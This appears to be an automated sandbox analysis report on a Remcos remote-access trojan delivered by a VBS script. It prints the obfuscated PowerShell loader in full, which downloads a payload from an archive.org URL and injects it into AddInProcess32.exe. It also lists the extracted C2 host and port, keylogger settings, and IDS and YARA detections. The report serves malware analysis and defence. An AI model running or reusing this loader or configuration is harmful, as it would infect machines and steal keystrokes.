Sh7MScrJ31udScrJ2xsJysnLCBbb2InKydqZWMnKyd0WycrJ10nKyddJysnQCcrJyh7JysnMH0wLycrJ1lqemInKyd0JysnL2QvZScrJ2UuZScrJ3RzYXAvLzpzJysncCcrJ3QnKyd0aHswfScrJyAsIHswfWQnKydlJysnc2F0JysnaXZhZCcrJ28nKyd7MH0gJysnLCcrJyB7MH1kZXNhdCcrJ2knKyd2JysnYWQnKydvJysnezB9ICwnKycgeycrJzAnKyd9ZGVzYXRpdicrJ2EnKydkb3swJysnfSwnKyd7MH0nKydBZGRJblByb2MnKydlcycrJ3MnKyczJysnMnswfSx7MH0nKyd7MCcrJ30pKScpLWYgIFtjSEFyXTM5LFtjSEFyXTM2KSB8JiAoICRlTnY6Q09Nc1BFY1s0LDI0LDI1XS1qT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9JysndXJsICcrJz0nKycgezB9aHQnKyd0cCcrJ3MnKyc6Ly9pYTYwMDEnKycwMCcrJy51cy4nKydhcmNoaXZlJysnLm9yJysnZycrJy8yNC8nKydpdGVtcy9kJysnZXQnKydhaC0nKyduJysnb3QnKydlLScrJ3YvRCcrJ2UnKyd0JysnYScrJ2hOJysnb3RlVicrJy4nKyd0JysneCcrJ3R7MH0nKyc7eycrJzEnKyd9YmFzZTYnKyc0JysnQ28nKydudGVudCA9IChOZScrJ3cnKyctT2JqZWMnKyd0IFN5c3RlJysnbS5OZXQuJysnV2ViQ2xpZScrJ250KS5EJysnb3cnKydubCcrJ28nKydhJysnZFN0cmknKyduZyh7MX11JysncmwpOycrJ3snKycxJysnfWJpbicrJ2FyeUNvJysnbicrJ3RlbnQgPScrJyBbU3knKydzdCcrJ2VtLicrJ0MnKydvbnZlcnQnKyddOjonKydGJysncm9tJysnQicrJ2EnKydzZTY0JysnU3RyaW5nKHsxfWJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpO3sxJysnfWFzJysnc2UnKydtYmx5JysnID0nKycgW1JlZmwnKydlY3QnKydpbycrJ24uJysnQXMnKydzZW1ibHknKyddOjpMb2FkJysnKHsxfScrJ2JpbmFyJysneUNvbicrJ3RlbnQpO3sxfXR5JysncCcrJ2UgJysnPSB7MX1hJysnc3MnKydlbWJsJysneScrJy4nKydHZXRUeXAnKydlKHsnKycwfVJ1bicrJ1BFLkhvbWV7JysnMH0pOycrJ3snKycxfW0nKydlJysndCcrJ2gnKydvZCA9IHsxfXR5cCcrJ2UuR2UnKyd0TWUnKyd0aCcrJ29kKHsnKycwfVZBSXswfSk7ezEnKyd9bWV0JysnaG8nKydkJysnLkknKydudm9rZSh7MScrJ31udScrJ2xsJysnLCBbb2InKydqZWMnKyd0WycrJ10nKyddJysnQCcrJyh7JysnMH0wLycrJ1lqemInKyd0JysnL2QvZScrJ2UuZScrJ3RzYXAvLzpzJysncCcrJ3QnKyd0aHswfScrJyAsIHswfWQnKydlJysnc2F0JysnaXZhZCcrJ28nKyd7MH0gJysnLCcrJyB7MH1kZXNhdCcr
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs", ProcessId: 3540, ProcessName: wscript.exe
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9JysndXJsICcrJz0nKycgezB9aHQnKyd0cCcrJ3MnKyc6Ly9pYTYwMDEnKycwMCcrJy51cy4nKydhcmNoaXZlJysnLm9yJysnZycrJy8yNC8nKydpdGVtcy9kJysnZXQnKydhaC0nKyduJysnb3QnKydlLScrJ3YvRCcrJ2UnKyd0JysnYScrJ2hOJysnb3RlVicrJy4nKyd0JysneCcrJ3R7MH0nKyc7eycrJzEnKyd9YmFzZTYnKyc0JysnQ28nKydudGVudCA9IChOZScrJ3cnKyctT2JqZWMnKyd0IFN5c3RlJysnbS5OZXQuJysnV2ViQ2xpZScrJ250KS5EJysnb3cnKydubCcrJ28nKydhJysnZFN0cmknKyduZyh7MX11JysncmwpOycrJ3snKycxJysnfWJpbicrJ2FyeUNvJysnbicrJ3RlbnQgPScrJyBbU3knKydzdCcrJ2VtLicrJ0MnKydvbnZlcnQnKyddOjonKydGJysncm9tJysnQicrJ2EnKydzZTY0JysnU3RyaW5nKHsxfWJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpO3sxJysnfWFzJysnc2UnKydtYmx5JysnID0nKycgW1JlZmwnKydlY3QnKydpbycrJ24uJysnQXMnKydzZW1ibHknKyddOjpMb2FkJysnKHsxfScrJ2JpbmFyJysneUNvbicrJ3RlbnQpO3sxfXR5JysncCcrJ2UgJysnPSB7MX1hJysnc3MnKydlbWJsJysneScrJy4nKydHZXRUeXAnKydlKHsnKycwfVJ1bicrJ1BFLkhvbWV7JysnMH0pOycrJ3snKycxfW0nKydlJysndCcrJ2gnKydvZCA9IHsxfXR5cCcrJ2UuR2UnKyd0TWUnKyd0aCcrJ29kKHsnKycwfVZBSXswfSk7ezEnKyd9bWV0JysnaG8nKydkJysnLkknKydudm9rZSh7MScrJ31udScrJ2xsJysnLCBbb2InKydqZWMnKyd0WycrJ10nKyddJysnQCcrJyh7JysnMH0wLycrJ1lqemInKyd0JysnL2QvZScrJ2UuZScrJ3RzYXAvLzpzJysncCcrJ3QnKyd0aHswfScrJyAsIHswfWQnKydlJysnc2F0JysnaXZhZCcrJ28nKyd7MH0gJysnLCcrJyB7MH1kZXNhdCcrJ2knKyd2JysnYWQnKydvJysnezB9ICwnKycgeycrJzAnKyd9ZGVzYXRpdicrJ2EnKydkb3swJysnfSwnKyd7MH0nKydBZGRJblByb2MnKydlcycrJ3MnKyczJysnMnswfSx7MH0nKyd7MCcrJ30pKScpLWYgIFtjSEFyXTM5LFtjSEFyXTM2KSB8JiAoICRlTnY6Q09Nc1BFY1s0LDI0LDI1XS1qT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9JysndXJsICcrJz0nKycgezB9aHQnKyd0cCcrJ3MnKyc6Ly9pYTYwMDEnKycwMCcrJy51cy4nKydhcmNoaXZlJysnLm9yJysnZycrJy8yNC8nKydpdGVtcy9kJysnZXQnKydhaC0nKyduJysnb3QnKydlLScrJ3YvRCcrJ2UnKyd0JysnYScrJ2hOJysnb3RlVicrJy4nKyd0JysneCcrJ3R7MH0nKyc7eycrJzEnKyd9YmFzZTYnKyc0JysnQ28nKydudGVudCA9IChOZScrJ3cnKyctT2JqZWMnKyd0IFN5c3RlJysnbS5OZXQuJysnV2ViQ2xpZScrJ250KS5EJysnb3cnKydubCcrJ28nKydhJysnZFN0cmknKyduZyh7MX11JysncmwpOycrJ3snKycxJysnfWJpbicrJ2FyeUNvJysnbicrJ3RlbnQgPScrJyBbU3knKydzdCcrJ2VtLicrJ0MnKydvbnZlcnQnKyddOjonKydGJysncm9tJysnQicrJ2EnKydzZTY0JysnU3RyaW5nKHsxfWJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpO3sxJysnfWFzJysnc2UnKydtYmx5JysnID0nKycgW1JlZmwnKydlY3QnKydpbycrJ24uJysnQXMnKydzZW1ibHknKyddOjpMb2FkJysnKHsxfScrJ2JpbmFyJysneUNvbicrJ3RlbnQpO3sxfXR5JysncCcrJ2UgJysnPSB7MX1hJysnc3MnKydlbWJsJysneScrJy4nKydHZXRUeXAnKydlKHsnKycwfVJ1bicrJ1BFLkhvbWV7JysnMH0pOycrJ3snKycxfW0nKydlJysndCcrJ2gnKydvZCA9IHsxfXR5cCcrJ2UuR2UnKyd0TWUnKyd0aCcrJ29kKHsnKycwfVZBSXswfSk7ezEnKyd9bWV0JysnaG8nKydkJysnLkknKydudm9rZSh7MScrJ31udScrJ2xsJysnLCBbb2InKydqZWMnKyd0WycrJ10nKyddJysnQCcrJyh7JysnMH0wLycrJ1lqemInKyd0JysnL2QvZScrJ2UuZScrJ3RzYXAvLzpzJysncCcrJ3QnKyd0aHswfScrJyAsIHswfWQnKydlJysnc2F0JysnaXZhZCcrJ28nKyd7MH0gJysnLCcrJyB7MH1kZXNhdCcr
                    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs", ProcessId: 3540, ProcessName: wscript.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9JysndXJsICcrJz0nKycgezB9aHQnKyd0cCcrJ3MnKyc6Ly9pYTYwMDEnKycwMCcrJy51cy4nKydhcmNoaXZlJysnLm9yJysnZycrJy8yNC8nKydpdGVtcy9kJysnZXQnKydhaC0nKyduJysnb3QnKydlLScrJ3YvRCcrJ2UnKyd0JysnYScrJ2hOJysnb3RlVicrJy4nKyd0JysneCcrJ3R7MH0nKyc7eycrJzEnKyd9YmFzZTYnKyc0JysnQ28nKydudGVudCA9IChOZScrJ3cnKyctT2JqZWMnKyd0IFN5c3RlJysnbS5OZXQuJysnV2ViQ2xpZScrJ250KS5EJysnb3cnKydubCcrJ28nKydhJysnZFN0cmknKyduZyh7MX11JysncmwpOycrJ3snKycxJysnfWJpbicrJ2FyeUNvJysnbicrJ3RlbnQgPScrJyBbU3knKydzdCcrJ2VtLicrJ0MnKydvbnZlcnQnKyddOjonKydGJysncm9tJysnQicrJ2EnKydzZTY0JysnU3RyaW5nKHsxfWJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpO3sxJysnfWFzJysnc2UnKydtYmx5JysnID0nKycgW1JlZmwnKydlY3QnKydpbycrJ24uJysnQXMnKydzZW1ibHknKyddOjpMb2FkJysnKHsxfScrJ2JpbmFyJysneUNvbicrJ3RlbnQpO3sxfXR5JysncCcrJ2UgJysnPSB7MX1hJysnc3MnKydlbWJsJysneScrJy4nKydHZXRUeXAnKydlKHsnKycwfVJ1bicrJ1BFLkhvbWV7JysnMH0pOycrJ3snKycxfW0nKydlJysndCcrJ2gnKydvZCA9IHsxfXR5cCcrJ2UuR2UnKyd0TWUnKyd0aCcrJ29kKHsnKycwfVZBSXswfSk7ezEnKyd9bWV0JysnaG8nKydkJysnLkknKydudm9rZSh7MScrJ31udScrJ2xsJysnLCBbb2InKydqZWMnKyd0WycrJ10nKyddJysnQCcrJyh7JysnMH0wLycrJ1lqemInKyd0JysnL2QvZScrJ2UuZScrJ3RzYXAvLzpzJysncCcrJ3QnKyd0aHswfScrJyAsIHswfWQnKydlJysnc2F0JysnaXZhZCcrJ28nKyd7MH0gJysnLCcrJyB7MH1kZXNhdCcrJ2knKyd2JysnYWQnKydvJysnezB9ICwnKycgeycrJzAnKyd9ZGVzYXRpdicrJ2EnKydkb3swJysnfSwnKyd7MH0nKydBZGRJblByb2MnKydlcycrJ3MnKyczJysnMnswfSx7MH0nKyd7MCcrJ30pKScpLWYgIFtjSEFyXTM5LFtjSEFyXTM2KSB8JiAoICRlTnY6Q09Nc1BFY1s0LDI0LDI1XS1qT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9JysndXJsICcrJz0nKycgezB9aHQnKyd0cCcrJ3MnKyc6Ly9pYTYwMDEnKycwMCcrJy51cy4nKydhcmNoaXZlJysnLm9yJysnZycrJy8yNC8nKydpdGVtcy9kJysnZXQnKydhaC0nKyduJysnb3QnKydlLScrJ3YvRCcrJ2UnKyd0JysnYScrJ2hOJysnb3RlVicrJy4nKyd0JysneCcrJ3R7MH0nKyc7eycrJzEnKyd9YmFzZTYnKyc0JysnQ28nKydudGVudCA9IChOZScrJ3cnKyctT2JqZWMnKyd0IFN5c3RlJysnbS5OZXQuJysnV2ViQ2xpZScrJ250KS5EJysnb3cnKydubCcrJ28nKydhJysnZFN0cmknKyduZyh7MX11JysncmwpOycrJ3snKycxJysnfWJpbicrJ2FyeUNvJysnbicrJ3RlbnQgPScrJyBbU3knKydzdCcrJ2VtLicrJ0MnKydvbnZlcnQnKyddOjonKydGJysncm9tJysnQicrJ2EnKydzZTY0JysnU3RyaW5nKHsxfWJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpO3sxJysnfWFzJysnc2UnKydtYmx5JysnID0nKycgW1JlZmwnKydlY3QnKydpbycrJ24uJysnQXMnKydzZW1ibHknKyddOjpMb2FkJysnKHsxfScrJ2JpbmFyJysneUNvbicrJ3RlbnQpO3sxfXR5JysncCcrJ2UgJysnPSB7MX1hJysnc3MnKydlbWJsJysneScrJy4nKydHZXRUeXAnKydlKHsnKycwfVJ1bicrJ1BFLkhvbWV7JysnMH0pOycrJ3snKycxfW0nKydlJysndCcrJ2gnKydvZCA9IHsxfXR5cCcrJ2UuR2UnKyd0TWUnKyd0aCcrJ29kKHsnKycwfVZBSXswfSk7ezEnKyd9bWV0JysnaG8nKydkJysnLkknKydudm9rZSh7MScrJ31udScrJ2xsJysnLCBbb2InKydqZWMnKyd0WycrJ10nKyddJysnQCcrJyh7JysnMH0wLycrJ1lqemInKyd0JysnL2QvZScrJ2UuZScrJ3RzYXAvLzpzJysncCcrJ3QnKyd0aHswfScrJyAsIHswfWQnKydlJysnc2F0JysnaXZhZCcrJ28nKyd7MH0gJysnLCcrJyB7MH1kZXNhdCcr
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1}'+'url '+'='+' {0}ht'+'tp'+'s'+'://ia6001'+'00'+'.us.'+'archive'+'.or'+'g'+'/24/'+'items/d'+'et'+'ah-'+'n'+'ot'+'e-'+'v/D'+'e'+'t'+'a'+'hN'+'oteV'+'.'+'t'+'x'+'t{0}'+';{'+'1'+'}base6'+'4'+'Co'+'ntent = (Ne'+'w'+'-Objec'+'t Syste'+'m.Net.'+'WebClie'+'nt).D'+'ow'+'nl'+'o'+'a'+'dStri'+'ng({1}u'+'rl);'+'{'+'1'+'}bin'+'aryCo'+'n'+'tent ='+' [Sy'+'st'+'em.'+'C'+'onvert'+']::'+'F'+'rom'+'B'+'a'+'se64'+'String({1}base64'+'Cont'+'en'+'t);{1'+'}as'+'se'+'mbly'+' ='+' [Refl'+'ect'+'io'+'n.'+'As'+'sembly'+']::Load'+'({1}'+'binar'+'yCon'+'tent);{1}ty'+'p'+'e '+'= {1}a'+'ss'+'embl'+'y'+'.'+'GetTyp'+'e({'+'0}Run'+'PE.Home{'+'0});'+'{'+'1}m'+'e'+'t'+'h'+'od = {1}typ'+'e.Ge'+'tMe'+'th'+'od({'+'0}VAI{0});{1'+'}met'+'ho'+'d'+'.I'+'nvoke({1'+'}nu'+'ll'+', [ob'+'jec'+'t['+']'+']'+'@'+'({'+'0}0/'+'Yjzb'+'t'+'/d/e'+'e.e'+'tsap//:s'+'p'+'t'+'th{0}'+' , {0}d'+'e'+'sat'+'ivad'+'o'+'{0} '+','+' {0}desat'+'i'+'v'+'ad'+'o'+'{0} ,'+' {'+'0'+'}desativ'+'a'+'do{0'+'},'+'{0}'+'AddInProc'+'es'+'s'+'3'+'2{0},{0}'+'{0'+'}))')-f [cHAr]39,[cHAr]36) |& ( $eNv:COMsPEc[4,24,25]-jOin'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1}'+'url '+'='+' {0}ht'+'tp'+'s'+'://ia6001'+'00'+'.us.'+'archive'+'.or'+'g'+'/24/'+'items/d'+'et'+'ah-'+'n'+'ot'+'e-'+'v/D'+'e'+'t'+'a'+'hN'+'oteV'+'.'+'t'+'x'+'t{0}'+';{'+'1'+'}base6'+'4'+'Co'+'ntent = (Ne'+'w'+'-Objec'+'t Syste'+'m.Net.'+'WebClie'+'nt).D'+'ow'+'nl'+'o'+'a'+'dStri'+'ng({1}u'+'rl);'+'{'+'1'+'}bin'+'aryCo'+'n'+'tent ='+' [Sy'+'st'+'em.'+'C'+'onvert'+']::'+'F'+'rom'+'B'+'a'+'se64'+'String({1}base64'+'Cont'+'en'+'t);{1'+'}as'+'se'+'mbly'+' ='+' [Refl'+'ect'+'io'+'n.'+'As'+'sembly'+']::Load'+'({1}'+'binar'+'yCon'+'tent);{1}ty'+'p'+'e '+'= {1}a'+'ss'+'embl'+'y'+'.'+'GetTyp'+'e({'+'0}Run'+'PE.Home{'+'0});'+'{'+'1}m'+'e'+'t'+'h'+'od = {1}typ'+'e.Ge'+'tMe'+'th'+'od({'+'0}VAI{0});{1'+'}met'+'ho'+'d'+'.I'+'nvoke({1'+'}nu'+'ll'+', [ob'+'jec'+'t['+']'+']'+'@'+'({'+'0}0/'+'Yjzb'+'t'+'/d/e'+'e.e'+'tsap//:s'+'p'+'t'+'th{0}'+' , {0}d'+'e'+'sat'+'ivad'+'o'+'{0} '+','+' {0}desat'+'i'+'v'+'ad'+'o'+'{0} ,'+' {'+'0'+'}desativ'+'a'+'do{0'+'},'+'{0}'+'AddInProc'+'es'+'s'+'3'+'2{0},{0}'+'{0'+'}))')-f [cHAr]39,[cHAr]36) |& ( $eNv:COMsPEc[4,24,25]-jOin'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9JysndXJsICcrJz0nKycgezB9aHQnKyd0cCcrJ3MnKyc6Ly9pYTYwMDEnKycwMCcrJy51cy4nKydhcmNoaXZlJysnLm9yJysnZycrJy8yNC8nKydpdGVtcy9kJysnZXQnKydhaC0nKyduJysnb3QnKydlLScrJ3YvRCcrJ2UnKyd0JysnYScrJ2hOJysnb3RlVicrJy4nK

                    Stealing of Sensitive Information

                    barindex
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ProcessId: 5344, TargetFilename: C:\ProgramData\remcos\logs.dat
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-26T10:58:22.327622+020020204231Exploit Kit Activity Detected188.114.97.3443192.168.2.749704TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-26T10:58:22.327622+020020204251Exploit Kit Activity Detected188.114.97.3443192.168.2.749704TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-26T10:58:26.305934+020020327761Malware Command and Control Activity Detected192.168.2.761743191.93.114.273000TCP
                    2024-09-26T10:58:28.954995+020020327761Malware Command and Control Activity Detected192.168.2.761748191.93.114.273000TCP
                    2024-09-26T10:58:31.600968+020020327761Malware Command and Control Activity Detected192.168.2.761751191.93.114.273000TCP
                    2024-09-26T10:58:34.260627+020020327761Malware Command and Control Activity Detected192.168.2.761752191.93.114.273000TCP
                    2024-09-26T10:58:36.960220+020020327761Malware Command and Control Activity Detected192.168.2.761753191.93.114.273000TCP
                    2024-09-26T10:58:39.616274+020020327761Malware Command and Control Activity Detected192.168.2.761754191.93.114.273000TCP
                    2024-09-26T10:58:42.257211+020020327761Malware Command and Control Activity Detected192.168.2.761755191.93.114.273000TCP
                    2024-09-26T10:58:44.898366+020020327761Malware Command and Control Activity Detected192.168.2.761756191.93.114.273000TCP
                    2024-09-26T10:58:47.538382+020020327761Malware Command and Control Activity Detected192.168.2.761757191.93.114.273000TCP
                    2024-09-26T10:58:50.194234+020020327761Malware Command and Control Activity Detected192.168.2.761758191.93.114.273000TCP
                    2024-09-26T10:58:52.851325+020020327761Malware Command and Control Activity Detected192.168.2.761759191.93.114.273000TCP
                    2024-09-26T10:58:55.491510+020020327761Malware Command and Control Activity Detected192.168.2.761760191.93.114.273000TCP
                    2024-09-26T10:58:58.178797+020020327761Malware Command and Control Activity Detected192.168.2.761761191.93.114.273000TCP
                    2024-09-26T10:59:00.959746+020020327761Malware Command and Control Activity Detected192.168.2.761762191.93.114.273000TCP
                    2024-09-26T10:59:03.616377+020020327761Malware Command and Control Activity Detected192.168.2.761763191.93.114.273000TCP
                    2024-09-26T10:59:06.272809+020020327761Malware Command and Control Activity Detected192.168.2.761764191.93.114.273000TCP
                    2024-09-26T10:59:08.944474+020020327761Malware Command and Control Activity Detected192.168.2.761766191.93.114.273000TCP
                    2024-09-26T10:59:11.710060+020020327761Malware Command and Control Activity Detected192.168.2.761769191.93.114.273000TCP
                    2024-09-26T10:59:14.366074+020020327761Malware Command and Control Activity Detected192.168.2.761770191.93.114.273000TCP
                    2024-09-26T10:59:17.147379+020020327761Malware Command and Control Activity Detected192.168.2.761771191.93.114.273000TCP
                    2024-09-26T10:59:19.804096+020020327761Malware Command and Control Activity Detected192.168.2.761772191.93.114.273000TCP
                    2024-09-26T10:59:22.447337+020020327761Malware Command and Control Activity Detected192.168.2.761773191.93.114.273000TCP
                    2024-09-26T10:59:25.085207+020020327761Malware Command and Control Activity Detected192.168.2.761774191.93.114.273000TCP
                    2024-09-26T10:59:28.363151+020020327761Malware Command and Control Activity Detected192.168.2.761775181.236.206.33000TCP
                    2024-09-26T10:59:31.010229+020020327761Malware Command and Control Activity Detected192.168.2.761776181.236.206.33000TCP
                    2024-09-26T10:59:33.650280+020020327761Malware Command and Control Activity Detected192.168.2.761777181.236.206.33000TCP
                    2024-09-26T10:59:36.306184+020020327761Malware Command and Control Activity Detected192.168.2.761778181.236.206.33000TCP
                    2024-09-26T10:59:38.930246+020020327761Malware Command and Control Activity Detected192.168.2.761779181.236.206.33000TCP
                    2024-09-26T10:59:41.585342+020020327761Malware Command and Control Activity Detected192.168.2.761780181.236.206.33000TCP
                    2024-09-26T10:59:44.226101+020020327761Malware Command and Control Activity Detected192.168.2.761781181.236.206.33000TCP
                    2024-09-26T10:59:46.912573+020020327761Malware Command and Control Activity Detected192.168.2.761782181.236.206.33000TCP
                    2024-09-26T10:59:49.553391+020020327761Malware Command and Control Activity Detected192.168.2.761783181.236.206.33000TCP
                    2024-09-26T10:59:52.210128+020020327761Malware Command and Control Activity Detected192.168.2.761784181.236.206.33000TCP
                    2024-09-26T10:59:54.821537+020020327761Malware Command and Control Activity Detected192.168.2.761785181.236.206.33000TCP
                    2024-09-26T10:59:57.414266+020020327761Malware Command and Control Activity Detected192.168.2.761786181.236.206.33000TCP
                    2024-09-26T10:59:59.929302+020020327761Malware Command and Control Activity Detected192.168.2.761787181.236.206.33000TCP
                    2024-09-26T11:00:02.446240+020020327761Malware Command and Control Activity Detected192.168.2.761788181.236.206.33000TCP
                    2024-09-26T11:00:04.930283+020020327761Malware Command and Control Activity Detected192.168.2.761789181.236.206.33000TCP
                    2024-09-26T11:00:07.397405+020020327761Malware Command and Control Activity Detected192.168.2.761790181.236.206.33000TCP
                    2024-09-26T11:00:10.663470+020020327761Malware Command and Control Activity Detected192.168.2.761791181.236.206.33000TCP
                    2024-09-26T11:00:13.091330+020020327761Malware Command and Control Activity Detected192.168.2.761792181.236.206.33000TCP
                    2024-09-26T11:00:15.477386+020020327761Malware Command and Control Activity Detected192.168.2.761793181.236.206.33000TCP
                    2024-09-26T11:00:18.736169+020020327761Malware Command and Control Activity Detected192.168.2.761794181.236.206.33000TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-26T10:58:22.145275+020028410751Malware Command and Control Activity Detected192.168.2.749704188.114.97.3443TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtAvira URL Cloud: Label: malware
                    Source: 00000007.00000002.2588250443.0000000000C28000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "23spt.duckdns.org:3000:0", "Assigned name": "Tost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-RZH5WZ", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                    Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.powershell.exe.19caef2a460.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.powershell.exe.19caef2a460.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.2589118650.000000000288F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2588250443.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1439903653.0000019CADA81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1439903653.0000019CAEAC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6488, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 5344, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,7_2_004338C8
                    Source: powershell.exe, 00000005.00000002.1439903653.0000019CADA81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_250b6228-f

                    Exploits

                    barindex
                    Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.powershell.exe.19caef2a460.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.powershell.exe.19caef2a460.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1439903653.0000019CADA81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1439903653.0000019CAEAC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6488, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 5344, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00407538 _wcslen,CoGetObject,7_2_00407538
                    Source: unknownHTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.7:49703 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49704 version: TLS 1.2
                    Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000005.00000002.1439903653.0000019CAEA2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1472944209.0000019CB5E90000.00000004.08000000.00040000.00000000.sdmp
